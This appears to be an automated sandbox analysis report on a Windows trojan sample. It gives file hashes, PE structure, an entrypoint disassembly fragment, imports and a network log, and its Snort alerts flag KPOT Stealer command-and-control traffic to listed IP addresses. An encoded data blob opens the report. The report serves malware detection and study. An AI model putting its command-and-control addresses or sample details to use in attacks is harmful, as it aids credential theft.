Preview:	2P96ufZgpunIrEx9SyDccVh7+9DI7trwn3PwivFG58YzZ6ijQ6oUI84vVahg1iDdB4mYv40hhUejX4aPHwxEKux55Yn6AlmxTFDL6hiSXcGjzt+nu/MJ6AfQ6g8cw7fR06WvNEqOgHj8b8KbGckFRdKUFY0WY5P+LvLbAiNQoLnseeWJ+gJZsdCu5rrLwByx3+VhIEOQuAqPB9qftfuOJ+x55Yn6Almxjx6tMq2coETyphGLLKPenux55Yn6AlmxhsmsB1fGjV3seeWJ+gJZsdvctGraj5IS+/eku18fZf6U+lfoEIin/bAIq2gqk2GXNBFyfn2MKt0yXSQUSIzHT7X/sr0z3ndvl9Qf35payIKY7gCiLAO3MAGpDoczN2t7TqN3rlxiyz+wCKtoKpNhl/UjqRndAbMDaW2EIfAUVa3D9WZmDqsZVDjzFvbaMCdB3B83VWffT0WJ60SUOsNVs/NpylREuNxgU3o62YOVtYrzacpURLjcYFmiuMsUS3hwgwcvLaRa+JJiYfXX8WTTuOx55Yn6AlmxTFDL6hiSXcGjzt+nu/MJ6AfQ6g8cw7fR06WvNEqOgHj8b8KbGckFRdKUFY0WY5P+LvLbAiNQoLnseeWJ+gJZsdCu5rrLwByx3+VhIEOQuApD6fAK1XwUDq4olLwynwKCDbvAgUDMBm28zfO7qHZPOh1v7I3y+09vp6QGWc9cv+dkuqWvsLEVf6HEIhJ0yR9ogYcD3F+mOLqiSB/zapB8k7zN87uodk86cSvz74p5ysp4ZWU9ETmXM08UMi3nE79KKwcgrQgBugKje7/utO6+cETeEBLaUCT82Jqg77LcPH+8zfO7qHZPOjoIify3Oo7qcLSLGOKCqWk61vTe9t0evonrRJQ6w1Wz75tlszyJ0efCvkF5rXfxHYnrRJQ6w1WzUsYl78aYXRWJ60SUOsNVs/Sjl2jrXMkQxxgv78k+UEejw48qu+pGSNlf0alGu/jf

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.698691719386506
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe
File size:	330240
MD5:	9dc97eaed4e61901afc327ce9f122262
SHA1:	41881d3463f4246d4d0146faf39703354bab83e9
SHA256:	4412624d06991fa64f684fcc6d66c787d040eaa12356885cf0a0919c732c82a3
SHA512:	1eee168706b0c311be4c1acbf5445abb717ec56247bd16d72d158ef749ecfb61f28ff6314f4b43511547f855eeae49da9c2e21647b2e0c6d92061b5b99d5f9e6
SSDEEP:	6144:cip/81Q0japryExXLvuHHONMC6cgwNvk5FxcT89iZrykuyK:lkq0japryExXLvuHM/yy0F0oeWkuy
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

File Icon


Icon Hash:	dbb864dcd4d6d4e1

Static PE Info

General
Entrypoint:	0x407b70
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5EC877B8 [Sat May 23 01:09:12 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	1f6a5004fbf9b4606919e70b2e7bb7ad

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007FC640A4E36Bh
call 00007FC640A41BC6h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 004389F8h
push 0040FDA0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [0043B50Ch]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0042E0FCh]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007FC640A41BD8h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007FC640A41D08h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007FC640A41D44h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007FC640A4F18Ah
add esp, 04h
test eax, eax
jne 00007FC640A41BBCh
push 0000001Ch
call 00007FC640A41CFCh
add esp, 04h
call 00007FC640A492D4h
test eax, eax
jne 00007FC640A41BBCh
push 00000010h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3a300	0x8f	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x39814	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x27c2000	0x4a38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e000	0x1e0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c281	0x2c400	False	0.458427127472	data	6.2712276466	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x2e000	0xc38f	0xc400	False	0.284518494898	data	4.65242607651	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3b000	0x27869bc	0x13200	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x27c2000	0x4a38	0x4c00	False	0.373458059211	data	4.29051641297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x27c3df0	0x130	data	Tibetan	Tibet
RT_CURSOR	0x27c3df0	0x130	data	Tibetan	Nepal
RT_CURSOR	0x27c3df0	0x130	data	Tibetan	India
RT_CURSOR	0x27c3f20	0xf0	data	Tibetan	Tibet
RT_CURSOR	0x27c3f20	0xf0	data	Tibetan	Nepal
RT_CURSOR	0x27c3f20	0xf0	data	Tibetan	India
RT_CURSOR	0x27c4010	0x10a8	dBase III DBT, version number 0, next free block index 40	Tibetan	Tibet
RT_CURSOR	0x27c4010	0x10a8	dBase III DBT, version number 0, next free block index 40	Tibetan	Nepal
RT_CURSOR	0x27c4010	0x10a8	dBase III DBT, version number 0, next free block index 40	Tibetan	India
RT_CURSOR	0x27c50e8	0xea8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Tibetan	Tibet
RT_CURSOR	0x27c50e8	0xea8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Tibetan	Nepal
RT_CURSOR	0x27c50e8	0xea8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Tibetan	India
RT_CURSOR	0x27c5f90	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Tibetan	Tibet
RT_CURSOR	0x27c5f90	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Tibetan	Nepal
RT_CURSOR	0x27c5f90	0x8a8	dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"	Tibetan	India
RT_ICON	0x27c2340	0x8a8	data	Slovak	Slovakia
RT_ICON	0x27c2be8	0x10a8	data	Slovak	Slovakia
RT_STRING	0x27c6860	0xbe	data	Tibetan	Tibet
RT_STRING	0x27c6860	0xbe	data	Tibetan	Nepal
RT_STRING	0x27c6860	0xbe	data	Tibetan	India
RT_STRING	0x27c6920	0x112	data	Tibetan	Tibet
RT_STRING	0x27c6920	0x112	data	Tibetan	Nepal
RT_STRING	0x27c6920	0x112	data	Tibetan	India
RT_ACCELERATOR	0x27c3d58	0x98	data	Tibetan	Tibet
RT_ACCELERATOR	0x27c3d58	0x98	data	Tibetan	Nepal
RT_ACCELERATOR	0x27c3d58	0x98	data	Tibetan	India
RT_ACCELERATOR	0x27c3cb8	0xa0	data	Tibetan	Tibet
RT_ACCELERATOR	0x27c3cb8	0xa0	data	Tibetan	Nepal
RT_ACCELERATOR	0x27c3cb8	0xa0	data	Tibetan	India
RT_GROUP_CURSOR	0x27c50b8	0x30	data	Tibetan	Tibet
RT_GROUP_CURSOR	0x27c50b8	0x30	data	Tibetan	Nepal
RT_GROUP_CURSOR	0x27c50b8	0x30	data	Tibetan	India
RT_GROUP_CURSOR	0x27c6838	0x22	data	Tibetan	Tibet
RT_GROUP_CURSOR	0x27c6838	0x22	data	Tibetan	Nepal
RT_GROUP_CURSOR	0x27c6838	0x22	data	Tibetan	India
RT_GROUP_ICON	0x27c3c90	0x22	data	Slovak	Slovakia

Imports

DLL

Import

KERNEL32.dll

SetPriorityClass, SetEndOfFile, GetCommState, ReadConsoleA, InterlockedDecrement, SetConsoleActiveScreenBuffer, WaitForSingleObject, ConnectNamedPipe, CallNamedPipeW, LocalFlags, SetProcessPriorityBoost, LoadLibraryW, TerminateThread, CopyFileW, GetPrivateProfileStructW, GetBinaryTypeA, lstrcatA, GetACP, lstrlenW, FindNextVolumeMountPointW, RaiseException, CreateJobObjectA, SetCurrentDirectoryA, GetStdHandle, FreeLibraryAndExitThread, SetLastError, GetProcAddress, EnterCriticalSection, GetLocalTime, LoadLibraryA, LocalAlloc, BuildCommDCBAndTimeoutsW, IsSystemResumeAutomatic, FindAtomA, GetTapeParameters, SetEnvironmentVariableA, CreateMutexA, EnumResourceNamesA, GetCurrentDirectoryA, OpenSemaphoreW, GetProfileSectionW, lstrcpyW, AreFileApisANSI, WideCharToMultiByte, InterlockedIncrement, MultiByteToWideChar, InterlockedCompareExchange, InterlockedExchange, Sleep, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, GetLastError, MoveFileA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleFileNameW, GetModuleHandleW, ExitProcess, GetCommandLineA, GetStartupInfoA, GetCPInfo, HeapValidate, IsBadReadPtr, RtlUnwind, LCMapStringW, LCMapStringA, GetStringTypeW, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, DebugBreak, WriteFile, OutputDebugStringA, WriteConsoleW, GetFileType, OutputDebugStringW, GetModuleFileNameA, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, HeapDestroy, HeapCreate, HeapFree, VirtualFree, GetStringTypeA, FlushFileBuffers, GetConsoleCP, GetConsoleMode, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, GetLocaleInfoA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, GetModuleHandleA, CloseHandle, CreateFileA

Exports

Name	Ordinal	Address
_asdasfafsweretwry@8	1	0x42c3c0
_asdga@4	2	0x42c3e0
_weewgg@8	3	0x42c3f0
_wsefwrgwrg@4	4	0x42c3d0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tibetan	Tibet
Tibetan	Nepal
Tibetan	India
Slovak	Slovakia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/23/21-17:49:28.029743	ICMP	402	ICMP Destination Unreachable Port Unreachable			88.80.20.20	192.168.2.6
02/23/21-17:49:31.029068	ICMP	402	ICMP Destination Unreachable Port Unreachable			88.80.20.20	192.168.2.6
02/23/21-17:49:38.691605	ICMP	402	ICMP Destination Unreachable Port Unreachable			88.80.21.20	192.168.2.6
02/23/21-17:49:41.703747	ICMP	402	ICMP Destination Unreachable Port Unreachable			88.80.21.20	192.168.2.6
02/23/21-17:49:49.661798	ICMP	402	ICMP Destination Unreachable Port Unreachable			194.54.82.12	192.168.2.6
02/23/21-17:49:52.674988	ICMP	402	ICMP Destination Unreachable Port Unreachable			194.54.82.12	192.168.2.6
02/23/21-17:50:00.964551	ICMP	402	ICMP Destination Unreachable Port Unreachable			190.115.26.106	192.168.2.6
02/23/21-17:50:03.976016	ICMP	402	ICMP Destination Unreachable Port Unreachable			190.115.26.106	192.168.2.6
02/23/21-17:50:11.787901	ICMP	402	ICMP Destination Unreachable Port Unreachable			88.80.20.20	192.168.2.6
02/23/21-17:50:14.814985	ICMP	402	ICMP Destination Unreachable Port Unreachable			88.80.20.20	192.168.2.6
02/23/21-17:50:20.923848	ICMP	402	ICMP Destination Unreachable Port Unreachable			88.80.20.20	192.168.2.6
02/23/21-17:50:35.408183	ICMP	402	ICMP Destination Unreachable Port Unreachable			194.54.82.12	192.168.2.6
02/23/21-17:50:35.496763	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.6	8.8.8.8
02/23/21-17:50:38.413293	ICMP	402	ICMP Destination Unreachable Port Unreachable			194.54.82.12	192.168.2.6
02/23/21-17:50:44.429488	ICMP	402	ICMP Destination Unreachable Port Unreachable			194.54.82.12	192.168.2.6
02/23/21-17:50:58.604059	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49782	47.91.94.99	192.168.2.6
02/23/21-17:50:58.649340	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49782	47.91.94.99	192.168.2.6
02/23/21-17:50:58.747348	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49783	47.91.94.99	192.168.2.6
02/23/21-17:50:58.792898	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49783	47.91.94.99	192.168.2.6
02/23/21-17:50:59.591034	TCP	2029837	ET TROJAN KPOT Stealer Initial CnC Activity M4	49785	80	192.168.2.6	47.91.94.99
02/23/21-17:51:25.991490	TCP	100000122	COMMUNITY WEB-MISC mod_jrun overflow attempt	49785	80	192.168.2.6	47.91.94.99

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 17:49:26.507648945 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.568002939 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.568113089 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.580323935 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.643345118 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.643393040 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.643413067 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.643431902 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.643460035 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.698681116 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.759579897 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.759720087 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.773189068 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.871579885 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.901645899 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.901763916 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.905924082 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.966279030 CET	443	49720	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:26.966494083 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:26.967876911 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.028428078 CET	443	49720	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.028580904 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.029460907 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.035722017 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.096185923 CET	443	49720	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.168421984 CET	443	49720	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.168531895 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.322278976 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.382694960 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.382834911 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.383408070 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.446396112 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.446458101 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.446496010 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.446589947 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.448738098 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.509562016 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.512334108 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.611759901 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.645770073 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.647932053 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.708237886 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.803044081 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:27.890166998 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:27.969407082 CET	49723	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:30.968594074 CET	49723	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:31.902333021 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:31.902357101 CET	443	49718	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:31.902466059 CET	49718	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:32.169240952 CET	443	49720	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:32.169280052 CET	443	49720	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:32.169583082 CET	49720	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:32.804702997 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:32.804744959 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:32.804872036 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:32.805716038 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:32.805810928 CET	49721	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:32.865992069 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:32.866025925 CET	443	49721	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:36.969172955 CET	49723	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:37.031599998 CET	443	49723	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:37.032181978 CET	49723	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:37.032202959 CET	49723	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:37.093846083 CET	443	49723	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:37.094388008 CET	49723	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:37.094412088 CET	49723	443	192.168.2.6	88.80.20.20
Feb 23, 2021 17:49:37.156073093 CET	443	49723	88.80.20.20	192.168.2.6
Feb 23, 2021 17:49:37.218599081 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.278948069 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.279102087 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.280038118 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.342916012 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.342961073 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.342988968 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.343159914 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.350857019 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.411712885 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.411919117 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.412889957 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.509716034 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.546415091 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.546569109 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.550663948 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.612569094 CET	443	49731	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.612668037 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.613410950 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.673923969 CET	443	49731	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.674062014 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.674715042 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.679651976 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:37.740122080 CET	443	49731	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.830059052 CET	443	49731	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:37.830168009 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.091106892 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.151488066 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.151590109 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.152288914 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.215027094 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.215066910 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.215089083 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.215167999 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.216870070 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.277477980 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.278970957 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.381747961 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.414695978 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.420701027 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.483743906 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.558332920 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:38.601944923 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:38.629625082 CET	49733	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:41.641439915 CET	49733	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:42.547583103 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:42.547625065 CET	443	49730	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:42.547666073 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:42.547692060 CET	49730	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:42.830601931 CET	443	49731	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:42.830643892 CET	443	49731	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:42.830755949 CET	49731	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:43.558770895 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:43.558800936 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:43.559005022 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:43.559155941 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:43.559240103 CET	49732	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:43.621851921 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:43.621881008 CET	443	49732	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:47.642009020 CET	49733	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:47.702294111 CET	443	49733	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:47.703397989 CET	49733	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:47.703583956 CET	49733	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:47.763926029 CET	443	49733	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:47.764153004 CET	49733	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:47.764240026 CET	49733	443	192.168.2.6	88.80.21.20
Feb 23, 2021 17:49:47.824429989 CET	443	49733	88.80.21.20	192.168.2.6
Feb 23, 2021 17:49:47.922647953 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.006597042 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.006755114 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.007999897 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.096163034 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.096195936 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.096213102 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.096271038 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.096306086 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.105026007 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.189529896 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.189604998 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.190459013 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.311444998 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.362210989 CET	443	49734	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.362322092 CET	49734	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.367152929 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.449736118 CET	443	49735	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.449943066 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.450583935 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.533785105 CET	443	49735	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.533924103 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.534477949 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.538763046 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.621354103 CET	443	49735	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.712933064 CET	443	49735	194.54.82.12	192.168.2.6
Feb 23, 2021 17:49:48.713066101 CET	49735	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.832123995 CET	49736	443	192.168.2.6	194.54.82.12
Feb 23, 2021 17:49:48.916541100 CET	443	49736	194.54.82.12	192.168.2.6
